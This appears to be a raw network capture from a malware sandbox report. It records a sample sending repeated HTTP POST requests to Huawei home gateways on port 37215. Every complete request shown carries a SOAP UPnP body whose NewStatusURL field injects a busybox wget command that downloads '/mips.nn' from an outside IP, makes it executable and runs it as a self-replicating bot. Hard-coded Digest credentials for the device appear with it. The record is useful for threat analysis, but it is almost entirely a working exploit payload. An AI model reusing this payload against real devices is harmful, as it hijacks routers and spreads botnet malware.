                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          58192.168.2.2335484157.179.102.7037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.103251934 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          59192.168.2.2334696157.238.137.24337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.103265047 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          60192.168.2.2358182197.201.212.8537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.103272915 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          61192.168.2.2337178157.192.167.15637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.103272915 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          62192.168.2.2338648197.235.85.13737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.103287935 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          63192.168.2.235079841.176.11.23737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.103291988 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          64192.168.2.2346336157.112.7.14137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.103297949 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          65192.168.2.2348800157.47.87.13537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.123616934 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          66192.168.2.2358800197.27.167.15737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.123650074 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          67192.168.2.2339484197.96.111.2037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.123692036 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          68192.168.2.234884841.175.184.11537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.123713017 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
